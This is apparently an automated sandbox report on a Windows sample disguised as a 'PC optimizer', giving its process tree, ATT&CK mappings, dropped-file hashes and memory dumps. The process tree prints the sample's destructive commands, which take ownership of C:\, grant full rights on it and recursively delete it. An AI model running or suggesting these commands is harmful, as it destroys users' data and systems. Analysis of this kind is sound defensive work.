PID 3868 wrote to memory of 3284	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	90
PID 3868 wrote to memory of 3284	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	90
PID 3284 wrote to memory of 1764	3284	cmd.exe	91
PID 3284 wrote to memory of 1764	3284	cmd.exe	91
PID 3868 wrote to memory of 4252	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	92
PID 3868 wrote to memory of 4252	3868	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	92
PID 4252 wrote to memory of 3412	4252	cmd.exe	93
PID 4252 wrote to memory of 3412	4252	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe
"C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,30
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1144
- - C:\Windows\system32\mode.com
    mode 145,30
    3⤵
    PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B takeown /f C:\ /r /d y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1464
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B icacls C:\ /grant administrators:F /t
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3284
- - C:\Windows\system32\icacls.exe
    icacls C:\ /grant administrators:F /t
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B cmd /c rd /s /q C:\
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4252
- - C:\Windows\system32\cmd.exe
    cmd /c rd /s /q C:\
    3⤵
    - Drops file in Drivers directory
    - Manipulates Digital Signatures
    - Boot or Logon Autostart Execution: Print Processors
    - Drops desktop.ini file(s)
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Modifies termsrv.dll
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:3412

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
1⤵
PID:4056

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4764

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
1⤵
PID:4036

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy
1⤵
PID:1756

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
1⤵
PID:4652

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy
1⤵
PID:4724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Print Processors

T1547.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Print Processors

T1547.012

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\C8NS4PKY\microsoft.windows[1].xml

Filesize
97B

MD5
3209f92b6f79d54b202c24e3dcbfd340

SHA1
55ffcaee24991ac620833d887684a4c75242435e

SHA256
d564ceba58a3b04624a0fa3fadc27acbec5787f605e93111ec53ffdb7e0baf45

SHA512
f097d2fc91bf8a4d25a4addec6a06ff4dfcfc32700e60338290fa45ef0abc4de8f827a843c8c8d7dd90df777ad632010f48b29a4e71d7329f1a0a9955ccc54ad

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe

Filesize
36KB

MD5
bad093419be1135cfe9694ea77088c78

SHA1
76204c7ca72cf666add9c9931389d635c82e8af0

SHA256
136808af50ee73df9befd76f7aca21765782565b0095227c5a287f3be0b5ef3c

SHA512
3b5cb7f80d7cbc557b5a32a995cd607257ac8e56af935ce6f64c54ba1f311a65ef00c69c69047b6eb7bb678c2b1bc0a3c37548aef417ea49e414e1a34bcf651d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.0.filtertrie.intermediate.txt

Filesize
28KB

MD5
ab6db363a3fc9e4af2864079fd88032d

SHA1
aa52099313fd6290cd6e57d37551d63cd96dbe45

SHA256
373bb433c2908af2e3de58ede2087642814564560d007e61748cdb48d4e9da3f

SHA512
d3d13d17df96705d0de119ad0f8380bfe6b7bc44c618e2fcd0233061a0ab15beae44d38c48a880121b35f90f56c1529e5f4cf1a19acb9e2cbba5d1c402c749c0

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.1.filtertrie.intermediate.txt

Filesize
5B

MD5
34bd1dfb9f72cf4f86e6df6da0a9e49a

SHA1
5f96d66f33c81c0b10df2128d3860e3cb7e89563

SHA256
8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

SHA512
e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\0.2.filtertrie.intermediate.txt

Filesize
5B

MD5
c204e9faaf8565ad333828beff2d786e

SHA1
7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

SHA256
d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

SHA512
e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\Apps.ft

Filesize
38KB

MD5
84ac0c242b77b8fc326db0a5926b089e

SHA1
cc6b367ae8eb38561de01813b7d542067fb2318f

SHA256
b1557167a6df424f8b28aabd31d1b7e8a469dd50d2ae4cbbd43afd8f9c62cf92

SHA512
8f63084bd5a270b7b05e80454d26127b69bcb98ec93d9fad58d77203934f46b677a3aaf20f29e73dcd7035deb61f4c0aa3b10acbc4c0fc210632c1d74f705d2f

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{18015ae7-7072-4560-b832-7eff070d10f4}\Apps.index

Filesize
1.0MB

MD5
f4514c93191e0efc0f61036e4ebb341a

SHA1
c80478e9a734790c18584f67a43518aa4a7dcf58

SHA256
43da4fa5f62affe399ceaac2d489b7cde610963a48e72d445bebe6f2c63a3600

SHA512
8aecb3491767e040a52f351908004db2c8f2f083397744585c2832212ec8aa288d3492be941a48b04774e16b43672ab167209776cbdef6692fef684fc54666a6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\apps.csg

Filesize
444B

MD5
5475132f1c603298967f332dc9ffb864

SHA1
4749174f29f34c7d75979c25f31d79774a49ea46

SHA256
0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd

SHA512
54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\apps.schema

Filesize
150B

MD5
1659677c45c49a78f33551da43494005

SHA1
ae588ef3c9ea7839be032ab4323e04bc260d9387

SHA256
5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb

SHA512
740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appsconversions.txt

Filesize
1.4MB

MD5
2bef0e21ceb249ffb5f123c1e5bd0292

SHA1
86877a464a0739114e45242b9d427e368ebcc02c

SHA256
8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307

SHA512
f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appsglobals.txt

Filesize
343KB

MD5
931b27b3ec2c5e9f29439fba87ec0dc9

SHA1
dd5e78f004c55bbebcd1d66786efc5ca4575c9b4

SHA256
541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e

SHA512
4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{e9fd81b9-c974-4320-94bb-6f00a5715fe0}\appssynonyms.txt

Filesize
237KB

MD5
06a69ad411292eca66697dc17898e653

SHA1
fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d

SHA256
2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1

SHA512
ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133775412632506468.txt

Filesize
73KB

MD5
4c036314f080c753345c8481caf9ae5f

SHA1
c90add2903b9de1bfac12a139e2551af8ec71745

SHA256
ca7a49706055df15b0d7f15795ca9846c18f76f20ce135c039f99096bf164b71

SHA512
2c42b710436c2153a935fdbee7399177deca03c9c877cff99ef2dfa237fc7da5cc0dfbd93129122b268f8eda79f34e41ea5f9c901e5dee35861a2c9dce09bc38

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

Filesize
264KB

MD5
1cfd4dfcfb7ff0db604853d410c7693f

SHA1
7e40d4593dc22157ab54c2bd91aa1de7b6b7a4d0

SHA256
e1da3f93231ecd911d800ae8bd4a81bf6c3443ea3cd3143a36ad96f3d4ab5d67

SHA512
db634f3057a665d89a8e9299617c9534ca4a3080c82fd60cbaf0a24e0d364480ac048d29376607427332334a9b819dd7c4f8325ec31340f7b544044f022faa89

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

Filesize
10KB

MD5
f3c9e170d9bfc6f2c39488c27eb58d01

SHA1
ff6ba2a9d0d6eaca53877f9b75fbc9525f8cf0c4

SHA256
76a58bfe1c97d51565d0d30e9be285d7d180e5563c132ed4d3be24a689f32976

SHA512
8c80705f90707b88fc7c13c334f44c909899755cf4157d7933bfdc0e859317cff1be56661d3ee6455e5ba5186debf1fda9115547015cdae9b3df2d34c81cbee6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

Filesize
10KB

MD5
3815fc4f8de2957b15bf53bd4adb67df

SHA1
f91af2aa83e4e0a4d95865d2ed90c4b39408fd88

SHA256
63719f42e2d08e280b70e4848dc1029260177d0d3df0dd89a4740555e92c981e

SHA512
14ed5a906442ac6283bb512a96daf4d5bbfa21c7804a9c25470f3068dd50a5c04c65ade117e96c898cf43bef9f39290f0d27fa5028399487418649fffee6b2ec

Download Submit
memory/552-48-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-45-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

Filesize
4KB

Download
memory/552-54-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-57-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-58-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-56-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-61-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-60-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-59-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-64-0x00000256E9DF0000-0x00000256E9DF1000-memory.dmp

Filesize
4KB

Download
memory/552-62-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-55-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-63-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-65-0x00000256E9DF0000-0x00000256E9DF1000-memory.dmp

Filesize
4KB

Download
memory/552-66-0x00000256EA100000-0x00000256EA101000-memory.dmp

Filesize
4KB

Download
memory/552-68-0x00000256EB640000-0x00000256EB641000-memory.dmp

Filesize
4KB

Download
memory/552-67-0x00000256EB640000-0x00000256EB641000-memory.dmp

Filesize
4KB

Download
memory/552-3-0x00000256E1940000-0x00000256E1950000-memory.dmp

Filesize
64KB

Download
memory/552-19-0x00000256E1A40000-0x00000256E1A50000-memory.dmp

Filesize
64KB

Download
memory/552-53-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-51-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-50-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-49-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-38-0x00000256E9C70000-0x00000256E9C71000-memory.dmp

Filesize
4KB

Download
memory/552-47-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-52-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-46-0x00000256E9DE0000-0x00000256E9DE1000-memory.dmp

Filesize
4KB

Download
memory/552-44-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

Filesize
4KB

Download
memory/552-42-0x00000256E9DB0000-0x00000256E9DB1000-memory.dmp

Filesize
4KB

Download
memory/552-43-0x00000256E9DC0000-0x00000256E9DC1000-memory.dmp

Filesize
4KB

Download
memory/552-40-0x00000256E9DB0000-0x00000256E9DB1000-memory.dmp

Filesize
4KB

Download
memory/3868-0-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp

Filesize
360KB

Download
memory/3868-2-0x00007FF679F50000-0x00007FF679FAA000-memory.dmp

Filesize
360KB

Download
memory/4764-91-0x0000018CB8120000-0x0000018CB8140000-memory.dmp

Filesize
128KB

Download
memory/4764-77-0x0000018CB8160000-0x0000018CB8180000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads